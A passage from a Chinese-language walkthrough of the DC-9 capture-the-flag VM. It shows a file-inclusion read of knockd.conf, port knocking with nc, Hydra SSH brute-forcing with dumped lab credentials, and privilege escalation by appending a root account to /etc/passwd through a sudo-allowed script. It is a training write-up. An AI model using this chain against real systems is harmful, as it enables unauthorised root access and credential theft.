Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash

返回信息

所已此页面存在文件包含漏洞

3.2.3 敲门服务

利用前一步发现的文件包含漏洞，看看敲门服务的配置文件。
访问链接：http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/knockd.conf
返回信息：

[options] 
UseSyslog [openSSH] sequence = 7469,8475,9842 
seq_timeout = 25 
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT 
tcpflags = syn [closeSSH] 
sequence = 9842,8475,7469 
seq_timeout = 25 
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT 
tcpflags = syn

返回敲门服务配置

[openSSH] sequence = 7469,8475,9842
上一行配置信息，说明了开启ssh服务，需要依次开启端口7469,8475,9842，
关闭端口則反过来依次关闭端口9842,8475,7469

3.3 SSH相关

3.3.1 nc开启SSH服务

──(root㉿kali)-[/home/kali]
└─#  for i in 7469 8475 9842 22 ;do nc 192.168.6.145 $i;done
(UNKNOWN) [192.168.6.145] 7469 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 8475 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 9842 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 22 (ssh) : Connection refused

如bash信息显示所示。

3.3.2 端口扫描

再次进行端口扫描测试

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 10:28 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:C1:5E:37 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds

此时发现，22端口已经开启，不再是“22/tcp filtered ssh”。O(∩_∩)O哈哈~

3.3.3 hydra

3.3.3.1 生成字典

利用SQL注入（3.1.3.1）时获得的用户信息，生成字典。
users.txt \ passwd.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat users.txt 
marym     
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2                      ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt 
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

3.3.3.2 执行hydra爆破ssh

利用生成的字典进行ssh爆破

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 10:50:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.6.145   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 10:51:39

获得一些用户名和密码：

用户名	密码
chandlerb	UrAG0D!
joeyt	Passw0rd
janitor	Ilovepeepee

3.4 ssh连接

3.4.1 chandlerb

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh chandlerb@192.168.6.145                                                     
chandlerb@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ whoami
chandlerb
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ cd /home
chandlerb@dc-9:/home$ ls
barneyr  chandlerb  janitor   jerrym  julied  monicag  rachelg	scoots	wilmaf
bettyr	 fredf	    janitor2  joeyt   marym   phoebeb  rossg	tomc
chandlerb@dc-9:/home$ cd chandlerb/
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$

chandlerb用户没有发现有用信息。

3.4.2 joeyt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh joeyt@192.168.6.145    
joeyt@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
joeyt@dc-9:~$ ls
joeyt@dc-9:~$ cd /home
joeyt@dc-9:/home$ ls
barneyr  bettyr  chandlerb  fredf  janitor  janitor2  jerrym  joeyt  julied  marym  monicag  phoebeb  rachelg  rossg  scoots  tomc  wilmaf
joeyt@dc-9:/home$

joeyt用户没有发现更多有用信息。

3.4.3 janitor

┌──(root㉿kali)-[/home/kali]
└─# ssh janitor@192.168.6.145  
janitor@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -al
total 16
drwx------  4 janitor janitor 4096 Jun  2 00:51 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Jun  2 00:51 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$ 
janitor@dc-9:~/.secrets-for-putin$ sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for janitor: 
Sorry, user janitor may not run sudo on dc-9.

如图所示，发现了一些密码，将新发现的密码添加到密码字典中。并且没有可执行sudo的命令。

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# vim passwd.txt ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt            
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

再次使用hydra爆破

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 11:48:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.6.145   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[STATUS] 329.00 tries/min, 329 tries in 00:01h, 63 to do in 00:01h, 15 active
[22][ssh] host: 192.168.6.145   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 11:49:34

获得新用户名和密码：

用户名	密码
fredf	B4-Tru3-001

3.4.4 fredf

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh fredf@192.168.6.145    
fredf@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
fredf@dc-9:~$ ls -al
total 12
drwx------  3 fredf fredf 4096 Jun  2 01:48 .
drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..
lrwxrwxrwx  1 fredf fredf    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 fredf fredf 4096 Jun  2 01:48 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser fredf may run the following commands on dc-9:(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$

我们在fredf用户系统里发现了可执行sudo命令的程序：
关键信息：(root) NOPASSWD: /opt/devstuff/dist/test/test
提示不需要密码就可以执行root命令。

查看test.py:

fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -al
total 28
drwxr-xr-x 5 root root 4096 Dec 29  2019 .
drwxr-xr-x 4 root root 4096 Dec 29  2019 ..
drwxr-xr-x 3 root root 4096 Dec 29  2019 build
drwxr-xr-x 3 root root 4096 Dec 29  2019 dist
drwxr-xr-x 2 root root 4096 Dec 29  2019 __pycache__
-rw-r--r-- 1 root root  250 Dec 29  2019 test.py
-rw-r--r-- 1 root root  959 Dec 29  2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()
fredf@dc-9:/opt/devstuff$

这是一个写入文件的脚本，生成一个密码用root权限执行脚本写入/etc/passwd文件，所以我们现在就需要构造一个拥有root权限的用户，并且在/etc/passwd文件中储存，只要使用这个用户登录后，就可以获取到root权限,实现提权。

3.5 linux系统提权

3.5.1 kali生成hash密码

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# openssl passwd -1 -salt admin 123456
$1$admin$LClYcRe.ee8dQwgrFc5nz.

生成了加密的密码：

$1$admin$LClYcRe.ee8dQwgrFc5nz.

3.5.2 将密码写入/etc/passwd

依次执行以下命令：

 echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwdcd /opt/devstuff/dist/test/ls -alsudo ./test /tmp/passwd /etc/passwd

fredf@dc-9:/opt/devstuff$ echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff$ cd /opt/devstuff/dist/test/
fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root    4096 Dec 29  2019 .
drwxr-xr-x 3 root root    4096 Dec 29  2019 ..
-rw-r--r-- 1 root root  779676 Dec 29  2019 base_library.zip
-rwxr-xr-x 1 root root   26136 Apr  3  2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  153904 Apr  3  2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  158032 Apr  3  2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   31024 Apr  3  2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  272688 Apr  3  2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  141616 Apr  3  2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  112944 Apr  3  2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   34008 Apr  3  2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   74688 Jul 11  2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13  2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root  243840 Sep 20  2019 libexpat.so.1
-rwxr-xr-x 1 root root  158400 Jan 28  2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr  3  2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root  309096 May  6  2018 libreadline.so.7
-rwxr-xr-x 1 root root  593696 Oct 13  2019 libssl.so.1.1
-rwxr-xr-x 1 root root  183528 Aug  6  2019 libtinfo.so.6
-rwxr-xr-x 1 root root  121280 Sep 26  2017 libz.so.1
-rwxr-xr-x 1 root root   37688 Apr  3  2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   64792 Apr  3  2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   14632 Apr  3  2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   39944 Apr  3  2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   19752 Apr  3  2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  116568 Apr  3  2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   29064 Apr  3  2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29  2019 test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$

成功将passwd写入到/etc/passwd目录

3.5.3 获得flag

3.5.3.1 切换admin用户

用户名：admin
密码：123456

fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password: 
root@dc-9:/opt/devstuff/dist/test#

命令行显示，已获得root权限。

3.5.3.2 查找flag文件

root@dc-9:/opt/devstuff/dist/test# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk

获得falg文件的位置：
/root/theflag.txt

3.5.3.3 查看flag文件

root@dc-9:/opt/devstuff/dist/test# cat /root/theflag.txt███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝Congratulations - you have done well to get to this point.Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.I also want to send out a big thank you to the various members of @m0tl3ycr3w .They are an inspirational bunch of fellows.Sure, they might smell a bit, but...just kidding.  :-)Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.So long, and thanks for all the fish.root@dc-9:/opt/devstuff/dist/test#